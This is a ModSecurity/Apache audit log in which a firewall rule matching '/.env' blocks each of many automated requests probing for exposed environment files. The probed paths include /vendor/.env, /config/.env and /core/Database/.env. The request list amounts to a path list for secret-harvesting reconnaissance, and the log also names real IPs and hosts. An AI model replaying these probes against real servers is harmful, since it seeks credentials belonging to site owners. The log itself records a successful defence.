X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.251.69.35 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --45ca4932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45ca4932-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745148578049970 944 (- - -) Stopwatch2: 1745148578049970 944; combined=328, p1=290, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45ca4932-Z-- --e9167a35-A-- [20/Apr/2025:19:03:24 +0700] aATijEAzeWrUIk0gvAsqrQAAAM0 103.236.140.4 33366 103.236.140.4 8181 --e9167a35-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 45.148.10.172 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 Accept-Charset: utf-8 --e9167a35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9167a35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745150604083409 915 (- - -) Stopwatch2: 1745150604083409 915; combined=342, p1=300, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9167a35-Z-- --bd910574-A-- [20/Apr/2025:19:23:57 +0700] aATnXUAzeWrUIk0gvAsrxQAAANM 103.236.140.4 38038 103.236.140.4 8181 --bd910574-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5 Accept-Charset: utf-8 --bd910574-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd910574-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151837882191 777 (- - -) Stopwatch2: 1745151837882191 777; combined=365, p1=329, p2=0, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd910574-Z-- --3409616e-A-- [20/Apr/2025:19:25:00 +0700] aATnnEAzeWrUIk0gvAsrzAAAAM4 103.236.140.4 38276 103.236.140.4 8181 --3409616e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3409616e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3409616e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151900073685 842 (- - -) Stopwatch2: 1745151900073685 842; combined=301, p1=262, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3409616e-Z-- --74f78c65-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsrzwAAAM0 103.236.140.4 38284 103.236.140.4 8181 --74f78c65-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --74f78c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74f78c65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901081858 796 (- - -) Stopwatch2: 1745151901081858 796; combined=292, p1=262, p2=0, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74f78c65-Z-- --fcef2361-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0AAAAMk 103.236.140.4 38286 103.236.140.4 8181 --fcef2361-B-- GET /lib/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --fcef2361-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcef2361-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901152806 770 (- - -) Stopwatch2: 1745151901152806 770; combined=261, p1=216, p2=0, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcef2361-Z-- --d704e45b-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0QAAAME 103.236.140.4 38288 103.236.140.4 8181 --d704e45b-B-- GET /lab/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d704e45b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d704e45b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901222956 925 (- - -) Stopwatch2: 1745151901222956 925; combined=377, p1=338, p2=0, p3=0, p4=0, p5=39, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d704e45b-Z-- --da3e2d6f-A-- [20/Apr/2025:19:25:01 +0700] aATnncTCDeBrh52UaHS-RAAAAJM 103.236.140.4 38290 103.236.140.4 8181 --da3e2d6f-B-- GET /cronlab/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --da3e2d6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da3e2d6f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901293862 728 (- - -) Stopwatch2: 1745151901293862 728; combined=254, p1=216, p2=0, p3=0, p4=0, p5=38, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da3e2d6f-Z-- --029c9c00-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0gAAAMQ 103.236.140.4 38292 103.236.140.4 8181 --029c9c00-B-- GET /cron/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --029c9c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --029c9c00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901364031 724 (- - -) Stopwatch2: 1745151901364031 724; combined=285, p1=251, p2=0, p3=0, p4=0, p5=34, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --029c9c00-Z-- --196d5474-A-- [20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NnAAAAAI 103.236.140.4 38294 103.236.140.4 8181 --196d5474-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --196d5474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --196d5474-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901437375 656 (- - -) Stopwatch2: 1745151901437375 656; combined=221, p1=191, p2=0, p3=0, p4=0, p5=30, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --196d5474-Z-- --cc92217c-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0wAAAMw 103.236.140.4 38296 103.236.140.4 8181 --cc92217c-B-- GET /core/app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cc92217c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc92217c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901520250 993 (- - -) Stopwatch2: 1745151901520250 993; combined=393, p1=350, p2=0, p3=0, p4=0, p5=43, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc92217c-Z-- --29f35d27-A-- [20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NnQAAABA 103.236.140.4 38298 103.236.140.4 8181 --29f35d27-B-- GET /core/Database/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --29f35d27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29f35d27-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901595528 622 (- - -) Stopwatch2: 1745151901595528 622; combined=249, p1=217, p2=0, p3=0, p4=0, p5=31, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29f35d27-Z-- --cddd632b-A-- [20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NngAAABI 103.236.140.4 38300 103.236.140.4 8181 --cddd632b-B-- GET /database/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cddd632b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cddd632b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901666519 572 (- - -) Stopwatch2: 1745151901666519 572; combined=204, p1=172, p2=0, p3=0, p4=0, p5=32, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cddd632b-Z-- --b8edba07-A-- [20/Apr/2025:19:25:01 +0700] aATnncTCDeBrh52UaHS-RQAAAJU 103.236.140.4 38302 103.236.140.4 8181 --b8edba07-B-- GET /system/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --b8edba07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8edba07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901738928 616 (- - -) Stopwatch2: 1745151901738928 616; combined=245, p1=173, p2=0, p3=0, p4=0, p5=72, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8edba07-Z-- --eaf8ec20-A-- [20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NnwAAAA4 103.236.140.4 38304 103.236.140.4 8181 --eaf8ec20-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --eaf8ec20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaf8ec20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901814134 895 (- - -) Stopwatch2: 1745151901814134 895; combined=345, p1=298, p2=0, p3=0, p4=0, p5=47, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaf8ec20-Z-- --6324b83b-A-- [20/Apr/2025:19:25:01 +0700] aATnncTCDeBrh52UaHS-RgAAAIo 103.236.140.4 38306 103.236.140.4 8181 --6324b83b-B-- GET /assets/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6324b83b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6324b83b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901885784 853 (- - -) Stopwatch2: 1745151901885784 853; combined=306, p1=258, p2=0, p3=0, p4=0, p5=48, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6324b83b-Z-- --a4f3a579-A-- [20/Apr/2025:19:25:01 +0700] aATnnVTf0pL9EQC7JDUZ1QAAAE0 103.236.140.4 38308 103.236.140.4 8181 --a4f3a579-B-- GET /fileweb/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a4f3a579-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4f3a579-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901956957 880 (- - -) Stopwatch2: 1745151901956957 880; combined=373, p1=337, p2=0, p3=0, p4=0, p5=35, sr=135, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4f3a579-Z-- --801b007f-A-- [20/Apr/2025:19:25:02 +0700] aATnnsTCDeBrh52UaHS-RwAAAIE 103.236.140.4 38310 103.236.140.4 8181 --801b007f-B-- GET /l53/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --801b007f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --801b007f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902030806 676 (- - -) Stopwatch2: 1745151902030806 676; combined=221, p1=190, p2=0, p3=0, p4=0, p5=31, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --801b007f-Z-- --1e5a584f-A-- [20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NoAAAAAc 103.236.140.4 38312 103.236.140.4 8181 --1e5a584f-B-- GET /club/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --1e5a584f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e5a584f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902101123 887 (- - -) Stopwatch2: 1745151902101123 887; combined=346, p1=295, p2=0, p3=0, p4=0, p5=51, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e5a584f-Z-- --04575f50-A-- [20/Apr/2025:19:25:02 +0700] aATnnlTf0pL9EQC7JDUZ1gAAAEc 103.236.140.4 38314 103.236.140.4 8181 --04575f50-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --04575f50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04575f50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 